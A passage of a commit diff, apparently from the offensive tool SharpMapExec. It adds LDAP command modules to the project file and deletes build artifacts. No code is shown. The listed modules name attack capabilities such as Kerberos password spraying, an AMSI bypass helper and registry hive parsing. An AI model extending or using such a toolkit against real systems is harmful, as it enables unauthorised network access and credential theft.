79	80		<Compile Include="Commands\KerberosSpray.cs" />
	81	+	<Compile Include="Commands\kerberosLdap.cs" />
80	82		<Compile Include="Commands\kerberosWinrm.cs" />
81	83		<Compile Include="Commands\NtlmReg32.cs" />
82	84		<Compile Include="Commands\NtlmSmb.cs" />
83	85		<Compile Include="Commands\NtlmCim.cs" />
	86	+	<Compile Include="Commands\NtlmLdap.cs" />
84	87		<Compile Include="Commands\NtlmWinrm.cs" />
85	88		<Compile Include="Helpers\AmsiFail.cs" />
86	89		<Compile Include="Helpers\Misc.cs" />
		skipped 2 lines
89	92		<Compile Include="Helpers\Impersonator.cs" />
90	93		<Compile Include="Helpers\Jea.cs" />
91	94		<Compile Include="Lib\Cim.cs" />
	95	+	<Compile Include="Lib\Domain.cs" />
92	96		<Compile Include="Lib\Reg32.cs" />
93	97		<Compile Include="Lib\Scan.cs" />
94	98		<Compile Include="Projects\HiveParser\Crypto.cs" />
		skipped 160 lines

■ ■ ■ ■ ■ ■

SharpMapExec/obj/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs

1	-	// <autogenerated />
2	-	using System;
3	-	using System.Reflection;
4	-	[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5	-

SharpMapExec/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache

Binary file.
■ ■ ■ ■ ■ ■

SharpMapExec/obj/Release/SharpMapExec.csproj.FileListAbsolute.txt

1 -

All occurrences

updated with ldap provider